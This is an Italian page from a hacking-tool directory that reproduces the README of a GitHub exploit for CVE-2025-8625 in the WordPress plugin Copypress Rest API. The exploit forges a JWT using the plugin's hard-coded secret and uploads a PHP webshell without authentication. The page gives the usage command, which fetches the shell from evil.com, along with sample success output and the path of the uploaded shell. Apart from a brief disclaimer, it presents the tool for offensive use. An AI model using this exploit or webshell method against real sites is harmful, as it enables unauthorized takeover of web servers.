Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8625 — Copypress Rest API 1.1 - 1.2 - Mancanza di un segreto JWT configurabile e di validazione del tipo di file che consentono l'esecuzione remota di codice non autenticata | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-8625
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubnxploited/cve-2025-8625

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - Mancanza di un segreto JWT configurabile e di validazione del tipo di file che consentono l'esecuzione remota di codice non autenticata

Vedi Repository
2111 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - Segreto JWT configurabile mancante e validazione del tipo di file per l'esecuzione remota di codice non autenticata

🛡️ Exploit RCE Copypress Rest API 1.1 - 1.2

📝 Descrizione

Il plugin Copypress Rest API per WordPress (versioni 1.1 - 1.2) è vulnerabile all'Esecuzione Remota di Codice tramite la funzione copyreap_handle_image().
Il plugin utilizza una chiave di firma JWT hard-coded quando non è impostato alcun segreto e non valida i tipi di file, consentendo ad attaccanti non autenticati di forgiare token e caricare file arbitrari (come shell PHP) attraverso l'endpoint del gestore immagini.

  • CVE: CVE-2025-8625
  • CVSS: 9.8 (Critico)

🚀 Panoramica dello Script

Nome script: CVE-2025-8625.py
Questo script Python automatizza lo sfruttamento della vulnerabilità, consentendo di generare un JWT valido, inviare una richiesta craftata e caricare un file dannoso (webshell) sul sito WordPress vulnerabile.


⚙️ Utilizzo

root@kitploit:~
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
  • -u / --url: URL del sito WordPress target
  • -shell / --shell: Link diretto alla tua webshell o file PHP dannoso

Output di esempio:

root@kitploit:~
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.

🏆 Funzionalità

  • Genera un JWT valido utilizzando il segreto hardcoded del plugin
  • Bypassa l'autenticazione per caricare file arbitrari
  • Fornisce un output chiaro per il successo/fallimento dello sfruttamento
  • Interfaccia a riga di comando semplice

📂 Posizione di Upload della Shell

Shell caricata con successo! 🎉
Esempio di percorso della shell:

root@kitploit:~
https://target.com/wp-content/uploads/2025/10/shell.php

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a test di penetrazione educativi e autorizzati.
L'utilizzo contro target senza esplicita autorizzazione è illegale.


Di: Nxploited (Khaled Alenazi)

Scarica lo strumento